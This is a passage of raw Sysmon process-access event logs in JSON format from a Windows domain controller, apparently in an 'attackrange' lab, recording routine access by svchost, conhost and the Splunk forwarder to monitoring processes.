05:48:42.199","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3303,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:42.199\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:42.199","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3304,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:42.199\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:42.199","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3305,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:42.199\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:42.199","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3306,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:42.199\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:42.199","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3307,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:42.199\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:42.199","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3308,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:42.199\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:42.199","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3309,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:42.199\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-023A-5F25-0000-00104E310500}\r\nTargetProcessId: 4500\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:42.199","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-023A-5F25-0000-00104E310500}","TargetProcessId":"4500","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3310,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:42.434\r\nSourceProcessGUID: {A837DB8D-023A-5F25-0000-00104E310500}\r\nSourceProcessId: 4500\r\nSourceThreadId: 2576\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nTargetProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:42.434","SourceProcessGUID":"{A837DB8D-023A-5F25-0000-00104E310500}","SourceProcessId":"4500","SourceThreadId":"2576","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","TargetProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","TargetProcessId":"2868","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
